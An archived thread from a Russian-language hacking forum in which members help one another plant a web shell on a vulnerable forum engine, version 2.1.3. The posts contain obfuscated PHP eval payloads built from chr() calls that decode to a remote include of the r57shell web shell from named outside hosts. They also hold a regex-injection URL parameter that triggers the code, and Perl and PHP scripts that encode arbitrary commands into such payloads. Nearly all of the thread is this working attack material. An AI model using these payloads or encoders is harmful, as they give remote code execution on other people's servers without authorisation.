HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу вместо Shell сайт производителя
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

вместо Shell сайт производителя
  #1  
Старый 04.10.2006, 01:50
Dimazzz
Участник форума
Регистрация: 23.11.2005
Сообщений: 179
Провел на форуме:
770940

Репутация: 23
Отправить сообщение для Dimazzz с помощью ICQ
По умолчанию вместо Shell сайт производителя
дело вообщем татакое:

нашол форум 2.1.3 , создал топик с таким содержимым

eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //

после чего через поиск нашол свои топ и добавил
&lastdate=z|eval.*?%20//)%23e%00

но странно не получил долгожданный шелл , а почемуто подгрузилась страница производителя , как будто шелла у них нет на сервере. Помогите в чем может быть дело.
 
Ответить с цитированием

  #2  
Старый 04.10.2006, 02:37
^ацтанЬ^
Новичок
Регистрация: 04.08.2006
Сообщений: 23
Провел на форуме:
40384

Репутация: 1
По умолчанию
Хы ты че тока узнал? воид закрылся, все файлы тоже закрыты
нада расшифровать код этот и вставить свой шел в .тхт формате и потом будет работать се
Вот тебе код чеб зашифровать

PHP код:
#!usr/bin/perl
while ()
{
   print "\r\nCommand for encode or 'exit' for exit ";
   while(<STDIN>)
    {
       $cmd=$_;
       chomp($cmd);
       exit() if ($cmd eq 'exit');
       last;
    }
 $len length($cmd);
 for ($i=0$i<$len$i++)
    {
  $s substr($cmd,$i,1);
  $out.="chr(".ord($s).")";
  if($i != $len-1)
    {
     $out.=".";
     }
   
 }
print "eval(system(".$out.").chr(59).exit()); //";
$out "";

а зашифрованно там это:
PHP код:
eval("include \"http://rst.void.ru/download/r57shell.txt\";/*"); 
 
Ответить с цитированием

  #3  
Старый 04.10.2006, 04:03
qPhoenix
Banned
Регистрация: 15.12.2005
Сообщений: 95
Провел на форуме:
1509352

Репутация: 132
Отправить сообщение для qPhoenix с помощью ICQ
По умолчанию
Спрашивается, зачем усложнять себе жизнь?
Вот код на ПХП, куда вставлять адрес - думаю видно...
PHP код:
<?php
$str="include \"http://rst.void.ru/download/r57shell.txt.gz\";/*";// */
echo "eval( ";
for($i=0;$i<strlen($str);$i++)
{
    echo "chr(".ord($str[$i])."). ";
}
echo "chr(".ord(" ").") ); //";
?
Кстать, файлы на рст не закрыты, а просто у некоторых изменились имена и случилось это еще до закрытия проекта...

rst.void.ru/download/r57shell.txt.gz

хоть и gz - канает без проблем...
 
Ответить с цитированием

  #4  
Старый 04.10.2006, 08:17
^ацтанЬ^
Новичок
Регистрация: 04.08.2006
Сообщений: 23
Провел на форуме:
40384

Репутация: 1
По умолчанию
Ну так всеравно надо зашифрововать опять
 
Ответить с цитированием

  #5  
Старый 04.10.2006, 10:43
_-[A.M.D]HiM@S-_
Green member
Регистрация: 28.12.2005
Сообщений: 376
Провел на форуме:
5559831

Репутация: 1833
По умолчанию
Вот пользуйся этим :
PHP код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(104). chr(105). chr(109). chr(97). chr(115). chr(50). chr(48). chr(48). chr(53). chr(46). chr(110). chr(97). chr(114). chr(111). chr(100). chr(46). chr(114). chr(117). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(112). chr(104). chr(112). chr(34). chr(59). chr(47). chr(42). chr(32) ); // 
 
Ответить с цитированием

  #6  
Старый 04.10.2006, 23:13
Azazel
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900

Репутация: 561


По умолчанию
Пльзуйся своим. Перевести можно тут http://www.paulschou.com/tools/xlate/
__________________
Full DNS report
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обзор бесплатных Cms em00s7 PHP 16 03.07.2009 13:13
Сделай сайт своей мечты SVipeR Мировые новости. Обсуждения. 4 12.09.2006 10:15
Сайт МТС BlackCats Уязвимости 1 15.05.2006 15:42
Сайт SCO [www.sco.com] деликатно взломали ФРАЙ Мировые новости. Обсуждения. 0 01.12.2004 00:27



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ